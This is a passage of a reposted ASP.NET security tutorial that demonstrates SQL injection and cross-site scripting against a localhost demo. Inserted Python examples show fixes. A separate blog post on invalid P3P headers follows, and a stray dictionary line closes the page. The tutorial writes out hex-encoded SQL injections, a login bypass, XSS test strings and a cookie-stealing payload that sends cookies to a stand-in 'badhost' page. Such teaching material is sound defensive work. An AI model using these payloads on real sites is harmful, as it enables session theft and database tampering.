If the URL parameter value is not an integer, try adding '; or '); or ; in front of the DECLARE keyword. See below for an example.

Listing 17

; DECLARE @S VARCHAR(500) SET @s= CAST(0x4946204f424a4543545f4944282774626c5f53514c496e6a656374696f6e272c27552729204953204e554c4c20435245415445205441424c452064626f2e5b74626c5f53514c496e6a656374696f6e5d285b4f75747075745d205b766172636861725d2835303029204e554c4c2920494e5345525420494e544f2064626f2e74626c5f53514c496e6a656374696f6e2053454c454354202770616765202d205375626a65637420746f2053514c20496e6a656374696f6e27 as VARCHAR(500))Exec(@s)-- …

Then execute the query "SELECT * FROM dbo.tbl_SQLInjection" in SQL Server Management Studio. If you see results similar to the ones shown below, the web page is subject to hex-based SQL Injection. Repeat the above step for the rest of the web pages.

Figure 10
after hacked

If the URL parameter value is not an integer, try adding '; or '); or ; in front of the query.

Cross-Site Scripting (CSS/XSS) attack

Definition: Enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users.
Let's say we have a login page that displays an error message for every unsuccessful attempt. The error message is carried in the query string of the URL and later displayed in a Label control. See figure 11.

Figure 11
Login page
Consider this scenario, an anonymous user sends you an email with the following content:

Listing 18

Dear Admin,
There is a problem with the login page: http://localhost:1234/Sample/LoginPage.aspx?strErr=
%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%6
9%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E
Or
“There is problem with the login page http://localhost:1234/Sample/LoginPage.aspx” with the URL pointing to the above link.

The part of the URL highlighted in grey is URL-encoded (each character written as a %-prefixed hexadecimal value). When decoded, it becomes

Listing 19

http://localhost:1234/Sample/LoginPage.aspx?strErr="><script src="http://localhost:9997/badhost/maliciousscript.js"></script>

If we let our guard down and click on the link in the email, the browser will execute the malicious scripts. Execute the URL and you should see a pop-up message. Shown below is a script embedded in the query string to steal browser cookies.

Listing 20

http://localhost:1234/Sample/LoginPage.aspx?strErr=
%3C%73%63%72%69%70%74%3E%76%61%72%20%73%3D%27%3C%49%46%52%41%4D%45%20%73%74%79%
6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%20%53%52%43%3D%68%74%74%70%3
A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%63
%6F%6F%6B%69%65%6D%6F%6E%73%74%65%72%2E%61%73%70%78%3F%63%3D%27%2b%65%73%63%61%
70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2b%27%3E%3C%5C%2F%49%
46%52%41%4D%45%3E%27%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%3C%
2F%73%63%72%69%70%74%3E

When decoded, it will look like:

Listing 21

http://localhost:1234/Sample/LoginPage.aspx?strErr=<script>var s='<IFRAME style="display:none" SRC=http://localhost:9997/badhost/cookiemonster.aspx?c='%2bescape(document.cookie)%2b'><\/IFRAME>';document.write(s)</script>

The script embeds an IFRAME in the page that points to http://localhost:9997/badhost/cookiemonster.aspx with a query string parameter "c". This parameter holds the cookie values created by the "SQLInjection_XSS_Demo" application. To demonstrate this, I created a few cookies on LoginPage.aspx. The cookiemonster.aspx page records all the cookie names and values in CookieJar.txt.

Listing 22

void FakeCookies()
  {
  Response.Cookies["email"].Value = "bryian.tan@mydomain.com";
  Response.Cookies["email"].Expires = DateTime.Now.AddDays(1);
  Response.Cookies["age"].Value = "22";
  Response.Cookies["age"].Expires = DateTime.Now.AddDays(1);
  }

After executing the above URL, we will see the below entries in the CookieJar.txt.

Figure 12
Cookies list

So what? What is the attacker going to do with my cookie information? Let's say the page stores some information in the cookies after a successful login attempt. Log in using one of the usernames found in the tbl_users table, then refresh the web page. The page will pull some information out of the cookies and display it on the page. See below.

Figure 13
Data from Cookies
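The two fixes that close the strErr and cookie-theft scenarios above, as an added example that is not code from this article or its sample project: HTML-encoding the query-string value before it reaches the Label, and issuing the cookies with HttpOnly so document.cookie cannot read them. The payload is listing 18/19's value rebuilt from the page's own percent-encoding; the `<span id="lblError">` markup is an assumption about how the Label renders.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import unquote

# Listing 18/19's strErr value, URL-decoded here (built from the page's own text).
STRERR_PAYLOAD = unquote(
    "%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22"
    "http://localhost:9997/badhost/maliciousscript.js"
    "%22%3E%3C%2F%73%63%72%69%70%74%3E"
)

# Assumed rendering of the Label control (not taken from the sample project).
LABEL_OPEN = '<span id="lblError" class="error">'
LABEL_CLOSE = "</span>"


def render_error_vulnerable(str_err):
    """What a Label does when its Text is set to the raw query-string value."""
    return LABEL_OPEN + str_err + LABEL_CLOSE


def render_error_safe(str_err):
    """HTML-encode for the context the value lands in; quote=True also neutralises attribute breaks."""
    return LABEL_OPEN + html.escape(str_err, quote=True) + LABEL_CLOSE


def injected_markup(rendered):
    """True if the text between the template's own tags contains tag characters of its own."""
    body = rendered[len(LABEL_OPEN):-len(LABEL_CLOSE)]
    return "<" in body or ">" in body


def set_cookie_header(name, value, http_only=True):
    """Build a Set-Cookie header; HttpOnly keeps the cookie out of document.cookie."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = http_only
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_error_vulnerable(STRERR_PAYLOAD))
    print(render_error_safe(STRERR_PAYLOAD))
    print(set_cookie_header("age", "22"))
```

Encoding is per output context: `html.escape` is right for text between tags, but a value placed inside a JavaScript string or a URL attribute needs that context's encoder instead. HttpOnly does not stop the script from running; it only denies the cookie-stealing IFRAME the value it came for, which is why both changes are needed together.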

Update table with malicious script

We already know the table and column names from the previous example. Execute the URL shown in listing 23 to update the MyComments table with JavaScript that tampers with the cookies; this script writes a script tag into the cookie value. Then navigate to the ListComments.aspx page to trigger the script and navigate back to LoginPage.aspx. You should see a popup message "XSS from bad host", indicating that the script was executed by the browser.

Listing 23

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Comment = %27<script>c="\<script src=\"http://localhost:9997/badhost/maliciousscript.js\"><\/script>"; document.cookie = "email="%2bc;</script> test %27 WHERE id =1 --

Let's append some malicious script to the MyComments table. Execute the URL shown below.

Listing 24

http://localhost:1234/Sample/ListComments.aspx?cid=1 %55%50%44%41%54%45%20%4D%79%43%6F%6D%6D%65%6E%74%73%20%53%45%54%20%4E%61%6D%65%3D%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%20%2D%2D

The URL string highlighted in grey, when decoded, becomes

Listing 25

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Name='<script src="http://localhost:9997/badhost/maliciousscript.js"></script>' --

Refresh the page, and we will see a popup message shown below. This indicates that the malicious script crafted by the attacker was successfully executed by the browser.

Figure 14
XSS from bad host

The URL shown below embeds an HTML IFrame in the page that triggers the cookiemonster.aspx page every time a user navigates to ListComments.aspx. Execute it, navigate to the ListComments.aspx page and observe that new contents are appended to the CookieJar.txt file without any trace or warning message.

Listing 26

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments SET Name='<script>var s="<IFRAME style=display:none SRC=http://localhost:9997/badhost/cookiemonster.aspx?c="%2bescape(document.cookie)%2b"><\/IFRAME>";document.write(s)</script>' --

 

Quick test

Append any of the strings highlighted in grey below to the URL of a web page that takes parameters. If you see a pop-up message, the web page is subject to Cross-Site Scripting.

• http://localhost:1234/Sample/LoginPage.aspx?strErr="><scrIpt>alert("XSS")</scriPt>
• http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3
• http://localhost:1234/Sample/LoginPage.aspx?strErr=</TITLE><sCRIPT>alert("XSS");</SCRIPt>
• http://localhost:1234/Sample/LoginPage.aspx?strErr=<BODY%20ONLOAD=alert("XSS")>
• http://localhost:1234/Sample/LoginPage.aspx?strErr="><iFRAME%20SRC="javascript:alert('XSS');"></IFRaME>

Forms input

SQL Injection

We can bypass the login page simply by entering ' or 1=1 -- as the login id and any value in the password field. See the example below.

Figure 15
SQL Injection login screen

If no maximum number of characters is defined on the TextBox, the attacker can append the SQL statement mentioned above to the form input's value. Let's say we have a page to update a comment and I update the comment with the value shown below. We should see a new entry in the tbl_SQLInjection table after the update.

Listing 27

'; DECLARE @S VARCHAR(500) SET @s= CAST(0x4946204f424a4543545f4944282774626c5f53514c496e6a656374696f6e272c27552729204953204e554c4c20435245415445205441424c452064626f2e5b74626c5f53514c496e6a656374696f6e5d285b4f75747075745d205b766172636861725d2835303029204e554c4c2920494e5345525420494e544f2064626f2e74626c5f53514c496e6a656374696f6e2053454c454354202770616765202d205375626a65637420746f2053514c20496e6a656374696f6e27 as VARCHAR(500))Exec(@s)--

Next, I'll demonstrate a simple way an attacker can set a column to the same value in every row of a table. Let's update the Name value with hacked ';--

Figure 16
Update column value to hacked

Retrieve all the rows from the MyComments table and observe that every value in the Name column was updated to "hacked". As mentioned earlier, the two consecutive hyphens "--" indicate a SQL comment, and the part of the statement after the hyphens will not be evaluated by the SQL server. Please make sure to back up the database before replicating this demonstration.

Figure 17
form injection update
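Both the query-string UNION walk earlier in the article (listings 2 to 7) and the ' or 1=1 -- login bypass just shown come down to one defect, the parameter being spliced into the SQL text, and one fix, binding it as a parameter after validating its type. The following is an added example, not code from this article or its sample project, that puts the vulnerable and the corrected handler side by side; it uses an in-memory sqlite database with constructed rows as a stand-in for TestDB, so the exact error strings differ from SQL Server but the behaviour is the same.

```python
import sqlite3


def make_db():
    """In-memory stand-in for TestDB with constructed rows (sqlite here, not SQL Server)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE MyComments (ID INTEGER, Name TEXT, Comment TEXT);
        CREATE TABLE tbl_users (username TEXT, password TEXT);
        INSERT INTO MyComments VALUES (1, 'alice', 'first comment');
        INSERT INTO tbl_users VALUES ('test@test.com', 'constructed-secret');
    """)
    return con


# --- ListComments.aspx?cid=... ------------------------------------------------------------

def list_comments_vulnerable(con, cid):
    """The request parameter is pasted into the SQL text, so it can extend the grammar."""
    sql = "SELECT ID, Name, Comment FROM MyComments WHERE ID = " + cid
    return con.execute(sql).fetchall()


def list_comments_safe(con, cid):
    """Validate the type the page really needs, then bind the value as a parameter."""
    cid_int = int(cid)                       # '1 UNION SELECT ...' raises ValueError here
    sql = "SELECT ID, Name, Comment FROM MyComments WHERE ID = ?"
    return con.execute(sql, (cid_int,)).fetchall()


# --- LoginPage.aspx -------------------------------------------------------------------------

def login_vulnerable(con, username, password):
    """Same defect on the form path: quotes in the input close the string literal."""
    sql = ("SELECT 1 FROM tbl_users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_safe(con, username, password):
    """Bound parameters are data, never grammar, whatever characters they contain."""
    sql = "SELECT 1 FROM tbl_users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    con = make_db()
    # Column-count-matched UNION probe (3 columns here), in the shape of listings 3-7.
    probe = "1 UNION SELECT NULL, username, password FROM tbl_users--"
    print("vulnerable:", list_comments_vulnerable(con, probe))
    try:
        list_comments_safe(con, probe)
    except ValueError as e:
        print("safe handler rejected the parameter:", e)
    print("login bypass on vulnerable:", login_vulnerable(con, "' or 1=1 --", "anything"))
    print("login bypass on safe:", login_safe(con, "' or 1=1 --", "anything"))
```

The `int()` check is not what makes the safe handler safe; the placeholder is. It is there because rejecting a non-numeric cid up front gives a clean 400-style failure and a log line worth alerting on, rather than a silent empty result. In the ASP.NET code the same shape is `SqlCommand` with `Parameters.AddWithValue` or a typed parameter.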

Cross-Site Scripting

Cross-Site Scripting enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users. This can happen through an input form. Update the comment with the string "<script src="http://localhost:9997/badhost/maliciousscript.js"></script>". You should see a pop-up message when you navigate to the ListComments.aspx page.

Figure 18
Update form with XSS

Quick Test

Update the form value with any of the strings listed below and observe the outcome. Make sure the string is on one line with no line breaks. If the browser executes the JavaScript or displays an unexpected result, then the web page is subject to Cross-Site Scripting.

• <BODY ONLOAD="javascript:window.location="http://www.google.com"">
• <BODY ONLOAD="javascript:alert("XSS")">
• <p onmouseover=javascript:window.location="http://www.google.com";>test
• <p onmousemove=javascript:window.location="http://www.google.com";>test
• <p onMouseDown=javascript:window.location="http://www.google.com";>test
• <span onmouseover=javascript:window.location="http://www.google.com";>test</span>
• <span onmousemove=javascript:window.location="http://www.google.com";>test</span>
• <h2 onmouseover=javascript:window.location="http://www.google.com";>test
• <div onmouseover=javascript:window.location="http://1208929383";>test
• <meta http-equiv="refresh" content="1; URL=http://1208929383">
• <b onmouseover=javascript:window.location="http://www.google.com"; >test
• <img onmouseover=javascript:window.location="http://www.google.com";>
• <img src=http://www.google.com/images/srpr/nav_logo14.png width="1" height="1" onLoad=javascript:window.location="http://www.google.com";>
• <div style="width:100%" onresize=javascript:window.location="http://www.google.com";>test</div> (Resize the browser to see the behavior)
• <tt style="width:100%" onmousemove=javascript:window.location="http://www.google.com";>test
• <PLAINTEXT> test
• <object> test
• <applet> test
• <textarea> test
• <title> test
• <table> test
• <style> test
• <noscript> test

JavaScript Event Injection vulnerability

The JavaScriptFunctionInjection.aspx page contains two examples of how to replicate the JavaScript Event Injection vulnerability using an ASP.NET inline tag and a client-side input control. The first example uses single quotes and the second uses double quotes (see figure 19). This vulnerability will work with the ASP.NET TextBox control if ValidateRequest is set to false. Copy one of the sample test inputs and hit the submit button (see figure 19).

Figure 19
JavaScript Event injection example
Type something in the input box and you should see a result similar to figure 20. Note: the output from the first example was encoded and the single quote was replaced with two single quotes on purpose.

Figure 20
JavaScript Event injection result
What is going on? We encoded the output and replaced each single quote with two single quotes! Let's take a closer look at the HTML markup. The JavaScript event was successfully injected in the first example but treated as a string in the second. The HtmlEncode method did not escape the single quote, but it escaped the double quote correctly. I would suggest not wrapping ASP.NET inline code in single quotes. Don't forget to test the second example; its output was deliberately not encoded.

Listing 28

<input id="Text1" name="Text1" type="text" value='a''
    onKeyDown=alert("gotcha+onKeyDown") '''  />
 
<input id="Text2" name="Text2" type="text" value="a''
    onKeyDown=alert("gotcha+onKeyDown") ''" />

Point of interest

Do not rely solely on client-side validation (JavaScript)

The attacker can bypass client-side validation by disabling JavaScript in the web browser. Do not depend exclusively on JavaScript to search for and replace potentially dangerous HTML statements or SQL Injection keywords. Make sure to revalidate the user inputs on the server side. I know it is a lot of work, but for the sake of security we have to do it. In the add comment section, the page uses JavaScript to check for blank fields. Try disabling JavaScript in your browser and adding the comment again. Click here to learn how to disable and enable JavaScript.

Replacing single quotation mark (') with two single quotation marks ('')

I saw some web sites mentioning that SQL Injection vulnerabilities can be prevented simply by replacing a single quotation mark with two single quotation marks. That is not always the case; attackers are still able to inject malicious script or HTML markup into the SQL table without using a single quotation mark. Malicious users can also bypass the filter by using different character encodings; please refer to "How To: Prevent Cross-Site Scripting in ASP.NET", table 1.

Inline Code/tags

There are several ways to display information from an ASP.NET program. We can display information in the page using an embedded code block <% ... %> or the <%= ... %> construct. Another way is to use data-binding syntax <%# ... %> to bind control property values to data and to specify values for retrieving, updating, deleting, and inserting data. Make sure to apply either the HttpUtility.HtmlEncode or Server.HtmlEncode method to encode form data and other client requests before displaying them in the web page. This will help prevent possible Cross-Site Scripting attacks. With ASP.NET 4.0, the new <%: ... %> code nugget syntax automatically HTML encodes the output before it is rendered.
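To show the quote-context point from the JavaScript Event Injection section and the encoding advice above in working code, here is an added example; it is not code from the article or from ASP.NET, but a Python stand-in. legacy_html_encode is an assumption modelled on the behaviour the article observed (double quote escaped, single quote left alone), full_attr_encode uses Python's html.escape, the parser is Python's own HTMLParser standing in for the browser, and the sample input is constructed in the style of listing 28.

```python
import html
from html.parser import HTMLParser


def legacy_html_encode(s):
    """Approximation of the older HtmlEncode behaviour the article describes:
    &, <, > and " are escaped, the single quote is left alone. This is an
    assumption modelled on the article's observation, not the .NET source."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def full_attr_encode(s):
    """Attribute-safe encoding: html.escape with quote=True also turns ' into
    &#x27;, which is what an encoder used inside any attribute must do."""
    return html.escape(s, quote=True)


def render_input(value, quote, encoder):
    """Build the <input> tag the way the article's inline code does, wrapping the
    encoded value in the given attribute quote character ('' means unquoted)."""
    return '<input id="Text1" name="Text1" type="text" value=%s%s%s />' % (
        quote, encoder(value), quote)


class AttrCollector(HTMLParser):
    """Record the attributes the parser assigns to the <input> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = {name: val for name, val in attrs}


def parse_attrs(markup):
    p = AttrCollector()
    p.feed(markup)
    p.close()
    return p.attrs


def injected_event(markup):
    """True when the parse yields any on* event-handler attribute, i.e. the
    user value broke out of the value attribute and became markup."""
    return any(name.startswith("on") for name in parse_attrs(markup))


# Constructed test input in the style of the article's listing 28.
SAMPLE = "a' onKeyDown=alert(\"gotcha\") '"


def check(value=SAMPLE):
    """Run the same value through the four rendering choices and report which
    ones let an event handler through."""
    return {
        "single_quoted_legacy": injected_event(render_input(value, "'", legacy_html_encode)),
        "single_quoted_full": injected_event(render_input(value, "'", full_attr_encode)),
        "double_quoted_legacy": injected_event(render_input(value, '"', legacy_html_encode)),
        "unquoted_full": injected_event(render_input(value, "", full_attr_encode)),
    }


if __name__ == "__main__":
    for name, broke_out in check().items():
        print("%-22s %s" % (name, "INJECTED" if broke_out else "safe"))
```

The two cases that let the handler through are the ones the article warns about: a single-quoted attribute with an encoder that does not touch the single quote, and an unquoted attribute, which no encoder can save because whitespace ends the value. Encoding the quote that delimits the attribute, and always delimiting the attribute, is the fix.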

Stored procedure

I'm using stored procedures in my web application; are stored procedures immune to SQL Injection attacks? The answer is "it depends". If we use dynamic SQL statements within a stored procedure, it may be open to SQL Injection attacks. Shown below is a stored procedure with a dynamic SQL statement in it.

Figure 21
Dynamic SQL
Update the comment field with the value ha ha ha';--. The "Update using inline query" and "Update using SP - Dynamic Query" buttons will update every comment field in the table with the specified value. On the other hand, the "Update using SP" button will only update the current record.
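The behaviour of the three buttons just described, and of the hacked ';-- update in the Forms input section, as an added example that is not part of the original article or its demo: Python with an in-memory SQLite table standing in for SQL Server and the article's MyComments table (the three sample rows are constructed). The dynamic-SQL path splices the value into the statement text, the parameterized path binds it; the same input goes through both.

```python
import sqlite3

# Constructed stand-in for the article's MyComments table.
SEED_ROWS = [(1, "alice", "first"), (2, "bob", "second"), (3, "carol", "third")]


def make_db():
    """Fresh in-memory copy of the table so each path starts from the same rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE MyComments (ID INTEGER PRIMARY KEY, Name TEXT, Comment TEXT)")
    conn.executemany(
        "INSERT INTO MyComments (ID, Name, Comment) VALUES (?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def update_comment_inline(conn, comment_id, value):
    """The 'Update using inline query' / dynamic-SQL stored procedure pattern:
    the user value is pasted into the statement text, so a quote closes the
    literal and -- comments out the WHERE clause that followed it."""
    sql = "UPDATE MyComments SET Comment = '%s' WHERE ID = %d" % (value, comment_id)
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # rows actually changed


def update_comment_param(conn, comment_id, value):
    """The 'Update using SP' pattern with a bound parameter: the value travels
    as data, never as SQL text, so quotes and -- are stored literally."""
    cur = conn.execute(
        "UPDATE MyComments SET Comment = ? WHERE ID = ?", (value, comment_id))
    conn.commit()
    return cur.rowcount


def comments(conn):
    return [row[0] for row in conn.execute(
        "SELECT Comment FROM MyComments ORDER BY ID")]


def demo(value="ha ha ha';--"):
    """Run one input through both paths against separate copies of the table.

    Returns (rows hit by the inline path, comments afterwards,
             rows hit by the parameterized path, comments afterwards)."""
    inline_db = make_db()
    inline_rows = update_comment_inline(inline_db, 1, value)
    param_db = make_db()
    param_rows = update_comment_param(param_db, 1, value)
    return inline_rows, comments(inline_db), param_rows, comments(param_db)


if __name__ == "__main__":
    inline_rows, inline_after, param_rows, param_after = demo()
    print("inline query touched", inline_rows, "rows:", inline_after)
    print("parameterized touched", param_rows, "row:", param_after)
```

With the article's value the inline path rewrites all three rows because the statement it executes is UPDATE MyComments SET Comment = 'ha ha ha' with the WHERE clause commented away; the parameterized path changes one row and stores the quote and the hyphens as ordinary characters. Whether the string concatenation happens in C# or inside a stored procedure that builds and executes dynamic SQL makes no difference, which is the article's point.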

Figure 22
Update comment

Request validation (ASP.NET)

Please note that the ValidateRequest attribute in the @page directive is set to false on purpose to emulate the Classic ASP environment and prevent the .NET framework from throwing the error (“A potentially dangerous Request.Form value was detected from the client”). If you happen to come across this error message in your application, rethink the business logic or page architecture before disabling the request validation.

More reading / Prevent SQL Injection and Cross-Site Scripting

Adding Cross-Site Scripting Protection to ASP.NET 1.0
ASP.NET 2.0 Security Best Practices – Must Read Article on MSDN
How To: Prevent Cross-Site Scripting in ASP.NET
Security Practices: ASP.NET Security Practices at a Glance
SQL Injection
SQL Injection General Guidance
Stop SQL Injection Attacks Before They Stop You

Conclusion

I hope someone will find this information useful. If you find any bugs or disagree with the contents, please drop me a line and I'll work with you to correct it. I would suggest downloading the demo and exploring it in order to grasp the full concept. Please send me an email if you want to help improve this article.

Resources

ASCII/HEX/HTML table
Cross Site Scripting
Data-Binding Expressions Overview
How To: Prevent Cross-Site Scripting in ASP.NET
SQL Injection cheat sheet
SQL Injection Walkthrough
String to hex
XType Datatype


Source http://blog.ysatech.com/post/2010/08/16/SQL-Injection-and-Cross-Site-Scripting.aspx

posted by 블르샤이닝 2012. 2. 21. 15:46

Facebook and many other sites also bypass Internet Explorer privacy controls


There is a post today on a Microsoft MSDN blog about how Google bypasses third-party cookie control in Internet Explorer by setting a false P3P header. The post author is Dean Hachamovitch, who is the VP for IE, and it follows up from a big story last week about how Google and a number of other ad networks are bypassing third-party cookie blocking in Safari by using a workaround (the workaround involves an IFRAME and a form that is submitted automatically using JavaScript).

The case with IE is different. Google (and many other sites) are taking advantage of the P3P protocol (a privacy extension to HTTP) to set third-party cookies. Here is a summary of what Google is doing, from the article:

By default, IE blocks third-party cookies unless the site presents a P3P Compact Policy Statement indicating how the site will use the cookie and that the site's use does not include tracking the user.

Here is what a valid P3P header looks like, as set by microsoft.com:

$ nc microsoft.com 80
HEAD / HTTP/1.1
Host: www.microsoft.com

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Feb 2012 04:29:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Location: http://www.microsoft.com
Content-Length: 23
Content-Type: text/html
Cache-control: private

If an invalid P3P header is set, or a header that doesn't state policy, Internet Explorer will by default accept the third-party cookies (this doesn't happen in IE9). This is what the P3P header looks like for google.com:

P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Not mentioned in the Microsoft article is that Facebook are also setting an invalid header ('invalid' may not be the right terminology here, but they are setting a header that does not contain valid privacy policies). This results in Internet Explorer (pre version 9) accepting the third-party cookies.

From facebook.com:

$ nc facebook.com 80
GET / HTTP/1.1
Host: www.facebook.com

HTTP/1.1 302 Found
Location: http://www.facebook.com/common/browser.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: datr=FxdDTzq9li7A7DRTAxVSXaZN; expires=Thu, 20-Feb-2014 04:01:27 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Debug: 8V3X/HiIi+1PrEZFy4c8LpavYxpBvnsojJ+pcYyGJUg=
X-Cnection: close
Date: Tue, 21 Feb 2012 04:01:27 GMT
Content-Length: 0

The reason Facebook gives for this header in the page that is linked from it is:

The organization that established P3P, the World Wide Web Consortium, suspended its work on this standard several years ago because most modern web browsers do not fully support P3P. As a result, the P3P standard is now out of date and does not reflect technologies that are currently in use on the web, so most websites currently do not have P3P policies.

Microsoft explicitly called out Google for their behaviour but either neglected to mention or didn't investigate Facebook (skeptics may believe that this is because of Microsoft's shareholding in Facebook and their partnerships in search and advertising (HT ashk4n)).

If Google is being asked to set proper P3P headers (and it appears that they have already altered at least some of their servers) then Facebook should also be held to the same standard.

We plan on surveying other popular sites to find who else is taking advantage of this loophole in P3P and its implementation to bypass third-party cookie controls in earlier Internet Explorer versions. Update: see below. I plan on running a more thorough survey of the top domains.

Survey of other sites

I looked up the Shodan Research HTTP archive to estimate how many other sites are bypassing Internet Explorer privacy controls for third-party cookies by setting an invalid P3P policy.

The database contains all the HTTP headers for the top 10,000 websites according to Alexa. The relevant headers (P3P, p3p, etc.) show that almost 500 sites are setting invalid P3P headers - almost a full 5% of the top 10,000 web servers surveyed.
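One way to run the classification this survey describes over captured responses, as an added example that is not part of the original post and not Shodan's code: the sample captures are constructed from the responses shown above (lines not shown on the page, such as a status line for google.com and the example.test host with no P3P header, are assumed), and the check is purely syntactic. It asks whether the CP attribute is made of compact-policy tokens or of prose; it does not evaluate what a policy says and does not reproduce Internet Explorer's own cookie decision.

```python
import re

# Captures constructed from the responses shown in this post, trimmed to the
# lines that matter, plus one made-up host that sends no P3P header at all.
CAPTURES = {
    "microsoft.com": (
        "HTTP/1.1 301 Moved Permanently\r\n"
        "Server: Microsoft-IIS/6.0\r\n"
        "P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo "
        "OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'\r\n"
        "Location: http://www.microsoft.com\r\n"
    ),
    "google.com": (
        "HTTP/1.1 200 OK\r\n"  # status line assumed; the post shows only the header
        'P3P: CP="This is not a P3P policy! See '
        "http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 "
        'for more info."\r\n'
    ),
    "facebook.com": (
        "HTTP/1.1 302 Found\r\n"
        "Location: http://www.facebook.com/common/browser.php\r\n"
        'P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"\r\n'
        "Set-Cookie: datr=FxdDTzq9li7A7DRTAxVSXaZN; expires=Thu, 20-Feb-2014 04:01:27 GMT; "
        "path=/; domain=.facebook.com; httponly\r\n"
    ),
    "example.test": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n",  # constructed
}

# The compact policy lives in a CP="..." or CP='...' attribute of the header.
CP_ATTR = re.compile(r"""CP\s*=\s*(["'])(.*?)\1""", re.I | re.S)
# Shape of one compact-policy token: three capitals plus an optional a/i/o
# qualifier, e.g. ADM, CONo, SAMo. Shape only; the token list is not checked.
CP_TOKEN = re.compile(r"^[A-Z]{3}[aio]?$")


def get_header(raw_response, name):
    """Return the first value of header `name` in a raw HTTP response, or None."""
    for line in raw_response.splitlines():
        if ":" not in line:
            continue  # status line or blank
        key, value = line.split(":", 1)
        if key.strip().lower() == name.lower():
            return value.strip()
    return None


def classify_p3p(p3p_value):
    """Classify a P3P header value.

    missing        - no P3P header at all
    no-cp          - header present but without a CP="..." attribute
    compact-policy - CP consists only of well-formed policy tokens
    free-text      - CP is present but its content is prose, not tokens
    """
    if p3p_value is None:
        return "missing"
    m = CP_ATTR.search(p3p_value)
    if not m:
        return "no-cp"
    tokens = m.group(2).split()
    if tokens and all(CP_TOKEN.match(t) for t in tokens):
        return "compact-policy"
    return "free-text"


def survey(captures):
    """Classify every captured response; returns {site: classification}."""
    return {site: classify_p3p(get_header(raw, "P3P")) for site, raw in captures.items()}


def tally(results):
    counts = {}
    for kind in results.values():
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    results = survey(CAPTURES)
    for site, kind in results.items():
        print("%-14s %s" % (site, kind))
    print(tally(results))
```

The "free-text" bucket is the one the post counts as invalid: a CP attribute that is present, so the header parses as a policy statement, but that carries a sentence instead of policy tokens. A real survey would feed real captures into survey() and keep the tally.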

header : boss, leader; a dog that herds cattle or sheep; a headlong plunge; a headlong fall